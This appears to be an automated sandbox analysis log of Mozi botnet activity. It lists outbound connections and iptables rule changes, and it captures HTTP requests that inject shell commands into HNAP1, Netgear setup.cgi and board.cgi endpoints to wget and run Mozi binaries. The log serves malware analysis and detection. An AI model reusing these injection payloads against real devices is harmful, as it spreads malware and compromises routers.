                Source: global trafficTCP traffic: 192.168.2.20:55896 -> 169.128.156.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:53628 -> 221.82.173.164:52869
                Source: global trafficTCP traffic: 192.168.2.20:37608 -> 138.84.230.69:37215
                Source: global trafficTCP traffic: 192.168.2.20:52472 -> 214.174.121.187:8080
                Source: global trafficTCP traffic: 192.168.2.20:36278 -> 108.225.201.127:81
                Source: global trafficTCP traffic: 192.168.2.20:53134 -> 175.19.214.30:49152
                Source: global trafficTCP traffic: 192.168.2.20:53630 -> 135.122.250.26:49152
                Source: global trafficTCP traffic: 192.168.2.20:41542 -> 85.46.127.177:8080
                Source: global trafficTCP traffic: 192.168.2.20:49464 -> 83.76.149.69:8080
                Source: global trafficTCP traffic: 192.168.2.20:50138 -> 133.60.187.33:5555
                Source: global trafficTCP traffic: 192.168.2.20:49468 -> 33.102.88.61:37215
                Source: global trafficTCP traffic: 192.168.2.20:52530 -> 206.35.150.107:8080
                Source: /bin/sh (PID: 4618)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 107.170.200.206:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 34.117.168.156:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.218.46.16:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
